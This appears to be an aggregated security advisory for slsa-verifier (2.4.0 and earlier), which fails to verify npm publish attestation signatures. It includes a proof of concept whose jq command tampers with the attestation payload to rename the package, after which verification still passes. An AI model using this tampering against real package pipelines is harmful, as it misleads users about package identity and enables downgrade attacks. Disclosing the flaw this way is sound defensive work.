Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1yMnh2LXZwcjItNDJtOc4AA2_p
slsa-verifier vulnerable to mproper validation of npm's publish attestations
Summary
slsa-verifier<=2.4.0
does not correctly verify npm's publish attestations signature.
Proof of concept
Steps to reproduce:
curl -Sso attestations.json $(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.attestations.url')
curl -Sso supreme-goggles.tgz "$(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.tarball')"
- In
attestations.json
, take the value addressed by thejq
selector.attestations[0].bundle.dsseEnvelope.payload
, base64decode it, tamper with it, base64encode that, and replace the original value with that. Save the file asattestations_tampered.json
.
Here is an example command to replace the package name with@attacker/malicious
:
jq -r ".attestations[0].bundle.dsseEnvelope.payload = \"$(jq -r '.attestations[0].bundle.dsseEnvelope.payload | @base64d' < attestations.json | jq '.subject[0].name = "pkg:npm/%40attacker/malicious"' | base64 -w0)\"" < attestations.json > attestations_tampered.json
SLSA_VERIFIER_EXPERIMENTAL=1 slsa-verifier verify-npm-package supreme-goggles.tgz --attestations-path attestations_tampered.json --builder-id "https://github.com/actions/runner/github-hosted" --package-name "@trishankatdatadog/supreme-goggles" --package-version 1.0.5 --source-uri github.com/trishankatdatadog/supreme-goggles
- The result is that
slsa-verifier
fails to detect this tampering of the publish attestation (unlike with the provenance attestation) and returnsPASSED
.
Impact
An attacker who controls what packages and attestations are shown to a user can associate a package with an arbitrary name and version that do not match what the user expects from the publish attestation. Furthermore, the package digest in the publish attestation need not match its counterpart in the provenance attestation. However, the attacker cannot associate the given package with an arbitrary source and builder that the user does not expect from the provenance attestation. Thus, the attacker could, for example, convince package managers to install authentic but older versions of packages that contain known, exploitable vulnerabilities.
Severity is considered low because 1) it does not invalidate the provenance and 2) support for npm is currently experimental.
Patches
Fixed by PR #705 and released in versions >=2.4.1
.
Workarounds
There is no easy way for users to fix or remediate this vulnerability without upgrading, short of verifying npm's publish attestations themselves, and cross-verifying it against GHA's provenance attestations.
References Permalink: https://github.com/advisories/GHSA-r2xv-vpr2-42m9
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMnh2LXZwcjItNDJtOc4AA2_p
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
Identifiers: GHSA-r2xv-vpr2-42m9
References:
- https://github.com/slsa-framework/slsa-verifier/security/advisories/GHSA-r2xv-vpr2-42m9
- https://github.com/slsa-framework/slsa-verifier/pull/705
- https://github.com/slsa-framework/slsa-verifier/commit/f6ae402f458b347d2c414f1d053fc1f8257888d0
- https://github.com/npm/attestation/tree/main/specs/publish/v0.1
- https://openssf.slack.com/archives/C03PDLFET5W/p1695330038983179
- https://github.com/advisories/GHSA-r2xv-vpr2-42m9
Blast Radius: 0.0
Affected Packages
go:github.com/slsa-framework/slsa-verifier
Dependent packages: 1Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 1.4.1
No known fixed version
All affected versions: 0.0.1, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.2.0, 1.2.1, 1.2.2, 1.3.0, 1.3.1, 1.3.2, 1.4.0, 1.4.1
go:github.com/slsa-framework/slsa-verifier/v2
Dependent packages: 2Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 2.4.0
Fixed in: 2.4.1-rc.0
All affected versions: 2.0.0, 2.0.1, 2.1.0, 2.2.0, 2.3.0, 2.4.0
All unaffected versions: 2.4.1, 2.5.1, 2.6.0